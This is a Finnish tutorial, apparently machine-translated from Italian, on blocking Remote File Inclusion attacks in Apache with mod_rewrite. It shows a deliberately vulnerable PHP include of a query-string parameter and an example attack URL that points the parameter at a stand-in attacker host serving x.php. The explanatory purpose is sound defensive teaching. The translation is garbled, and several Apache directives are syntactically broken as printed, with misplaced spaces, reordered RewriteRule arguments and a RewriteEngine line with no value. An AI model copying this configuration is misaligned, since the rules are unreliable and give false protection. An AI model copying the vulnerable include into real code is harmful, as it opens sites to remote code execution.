Käyttämällä mod_rewrite estää sisällyttäminen etätiedostojen

Yksi yleisimmistä hyökkäyksistä kärsimät sivustot tapahtuu yrittää myös tiedostoja, jotka sisältävät haittaohjelmia, teoriassa puhuu hyökkäys on hyvin yksinkertainen tehdä, tehdä niin vain siksi tiedosto sisältää haitallisen koodin ja URL kirjoittaa selain.

Tämäntyyppinen hyökkäys, joka tunnetaan tekninen termi Remote File Inclusion tai yksinkertaisesti lyhenne RFI, liittyy usein tila nimeltään tunkeutumisen XSA (Cross-Server Attack) yleensä tehdä kompromisseja turvallisuuden verkkosivujen jos ei Web-palvelimeen, tekijä, joka tekee siitä vieläkin vaarallista RFI.

Hyökkäyksen RFI, hyökkääjä tarvitsee "muisti" sovelluksesta, jossa tehdä sen sisällyttämistä etänä, tämä "tila" on yleensä "reikä" (Bug) turvallisuutta, joka tekee siitä haavoittuvan skriptin.
Klassinen esimerkki vuoto herkkä RFI liittyy kulkee sivun kautta muuttujien nimet, vain yksinkertaisen koodinpätkän näin vaarantaa sovellus:

 



 # Include-tiedostojen kautta QueryString muuttuja läpi







 include ($ _GET ['sivu']);

 

Vuonna koodi olemme määrittelemätön muuttuja, tai pikemminkin määritellä parametrien lähetetään QueryString, esimerkiksi jos suora osoite sivulle, jossa ehdotetaan listaus näyttää tältä:

 



 http://www.sito.com/index.php?pagina=news.php

 

muuttujan arvo $ sivu on yhtä kuin "News" hyökkäys Tämä sovellus voidaan toteuttaa tällä tavalla:

 



 http://www.sito.com/index.php?pagina=http://www.attacco.com/x.php

 

Tiedosto "x.php", siinä tapauksessa onnistuneen hyökkäyksen, voi sisältää mitä tahansa haitallisen koodin ja vahingoittaa huomattavasti suuremmat ja lopullinen kuin yksinkertaisuus hyökkäys voidaan ajatella.

Onneksi on olemassa joitakin puolustus tekniikoita, joita voidaan käyttää estämään tällaisten hyökkäysten aikana tämä lyhyt keskustelu analysoimme joka perustuu URL-moduuli (mod_rewrite) antamat Apache www-palvelin, jota voidaan hyödyntää menetelmiä eri.

Yksi klassinen lähettää ohjeita Apache Web Server on käyttää klassista. Htaccess tiedosto sisällyttää kansioon haluat suojata hyökkäyksiltä.

Ensimmäinen menetelmä, jota käytämme on lisätä yksinkertainen sääntö a. htaccess tiedosto:

 RewriteCond% {QUERY_STRING} (.*)( http | https | ftp): \ / \ /(.*)







 ^(.+)$ RewriteRule - [F]

Säännössä todetaan, että muotoiltu QueryString ("{QUERY_STRING}") ei voida siirtää argumentteja sisältäviä päätteitä "http", "https" ja "ftp" Ei ole väliä mitä sisältöä edellisen tai seuraavan ("(.*)" ) parametreja. Jos näin käy web palvelin palauttaa virheen tyyppi 403 (kielletty).

Ne, joilla on mahdollisuus suoran pääsyn asetustiedostoa Apache (httpd.conf), se voidaan sijoittaa sisälle yhden kontin, direktiivi voi vaikuttaa verrattavissa sääntöjä prededentemente:

 # Tarkista että mod_rewrite on käytettävissä







 <IfModule Mod_rewrite.c>







 # Aktivoi URL-moottori

 





 RewriteEngine

 





 # Olimme asettaneet sääntöä vastaan ​​RFI







 RewriteCond% {QUERY_STRING} (.*)( http | https | ftp): \ / \ /(.*)







 # Suodattaa pois mahdollisia hakemuksia osallisuuden ja merkitä







 # Vraibile ympäristön kanssa [E = varname: arvo]







 ^(.+)$ RewriteRule - [F, E = RFI: true]

 





 </ IfModule>

 





 # Creaimo lokia yrittää RFI me identficato







 # Aikaisemmin käyttäen "ympäristömuuttujan"







 CustomLog / FOLDER_NAME / rfi.log yhdistettynä ENV = RFI

Kirjoittamisen jälkeen direktiivin asetustiedostoon, sinun on tallennettava muutokset ja käynnistä palvelin tulevat voimaan, huomaa, että lopussa listalle, ja ulkopuolella kontti on asetettu pyynnön luoda lokitiedoston tarkoitus äänittää pyyntöjä etätiedostojärjestelmän osallisuutta, seuranta tämä pieni "estää muistiinpanoja RFI iskuista" huomaamme, että yrityksistä Remote File Inclusion verkkopalvelumme vähemmän harvinaista kuin uskoivat.